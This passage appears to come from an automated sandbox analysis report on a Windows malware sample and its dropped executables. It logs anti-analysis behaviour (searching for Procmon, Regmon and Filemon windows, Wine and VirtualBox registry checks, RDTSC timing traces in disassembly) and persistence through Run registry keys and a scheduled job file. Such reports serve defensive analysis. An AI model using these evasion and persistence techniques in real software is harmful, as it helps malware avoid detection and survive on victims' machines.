Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09d417a7c4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09d417a7c4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 353ab0ae6e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 353ab0ae6e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29af563a7b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29af563a7b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B2712 second address: 6B2728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBBEh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B2728 second address: 6B275D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F8C54522440h 0x0000000b jmp 00007F8C54522434h 0x00000010 js 00007F8C54522426h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8C5452242Ah 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B275D second address: 6B2779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F8C5451FBC5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBE10 second address: 6CBE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8C54522426h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBE22 second address: 6CBE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBE36 second address: 6CBE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBF84 second address: 6CBFA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBFA4 second address: 6CBFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBFAA second address: 6CBFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBFAE second address: 6CBFB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC0D4 second address: 6CC0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC0DF second address: 6CC0EE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F8C54522426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC0EE second address: 6CC0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC0FE second address: 6CC133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C54522436h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8C54522437h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC248 second address: 6CC25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C5451FBBDh 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC25E second address: 6CC262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC262 second address: 6CC268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC50A second address: 6CC517 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C54522426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC517 second address: 6CC52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8C5451FBB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F8C5451FBB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEC16 second address: 6CEC66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5452242Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8C5452242Bh 0x00000010 jmp 00007F8C54522435h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F8C5452242Fh 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEC66 second address: 6CEC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEC6B second address: 6CEC75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CED97 second address: 6CEDCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5CCFA3B0h 0x00000010 and si, A257h 0x00000015 lea ebx, dword ptr [ebp+1244EB56h] 0x0000001b mov edx, esi 0x0000001d mov ch, 97h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEDCE second address: 6CEDD8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C54522426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEDD8 second address: 6CEE00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C5451FBBDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEE93 second address: 6CEE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEE97 second address: 6CEEFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8C5451FBC1h 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F8C5451FBC4h 0x0000001f jmp 00007F8C5451FBBEh 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 ja 00007F8C5451FBC4h 0x0000002d push eax 0x0000002e push edx 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEEFD second address: 6CEF83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C54522426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F8C5452242Eh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 jno 00007F8C5452242Ch 0x0000001e popad 0x0000001f pop eax 0x00000020 jo 00007F8C54522437h 0x00000026 jmp 00007F8C54522431h 0x0000002b mov dword ptr [ebp+122D324Ch], ecx 0x00000031 push 00000003h 0x00000033 mov dword ptr [ebp+122D2FC4h], edi 0x00000039 push 00000000h 0x0000003b mov edi, dword ptr [ebp+122D1CD9h] 0x00000041 call 00007F8C5452242Bh 0x00000046 mov ecx, 00A18507h 0x0000004b pop edx 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122D3AEAh], ecx 0x00000054 add dl, FFFFFFEDh 0x00000057 call 00007F8C54522429h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEF83 second address: 6CEF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEF8A second address: 6CEFA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEFA4 second address: 6CEFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
